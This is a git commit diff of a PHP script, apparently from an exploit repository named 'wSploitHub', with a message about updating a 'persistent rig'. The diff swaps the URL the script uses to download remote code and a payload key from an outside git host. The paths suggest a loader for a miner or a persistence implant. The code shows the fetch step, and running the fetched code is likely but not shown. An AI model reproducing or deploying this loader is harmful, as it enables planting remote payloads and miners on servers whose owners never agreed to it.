ternak: update presisten rig

This commit is contained in:
syn 2025-01-29 20:14:17 +07:00
parent caf0d30443
commit eb5709f4a1

View File

@ -11,7 +11,7 @@ function get_contents($url) {
return $result;
}
$hashUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/api/v2/payloadkey';
$codeUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/raw/php/prisisten';
$codeUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/farm/rig/rig';
$keyHash = trim(get_contents($hashUrl));
if (empty($keyHash)) {
die("Die! Hash URL.\n");